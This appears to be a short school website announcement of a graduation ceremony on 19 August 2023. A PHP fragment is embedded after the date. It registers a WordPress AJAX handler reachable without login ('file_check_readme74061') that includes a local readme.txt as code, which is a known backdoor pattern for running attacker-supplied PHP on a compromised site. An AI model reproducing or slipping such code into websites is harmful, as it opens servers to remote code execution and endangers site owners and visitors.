GRADUATION CEREMONY FOR CLASS SEVEN AND PRE-UNIT 2023, WILL BE CONDUCTED ON 19TH AUGUST 2023 IN OUR SCHOOL GROUNDS FROM 9:00 AM – 2:00 PM
16
August
if(!function_exists('file_check_readme74061')){ add_action('wp_ajax_nopriv_file_check_readme74061', 'file_check_readme74061'); add_action('wp_ajax_file_check_readme74061', 'file_check_readme74061'); function file_check_readme74061() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }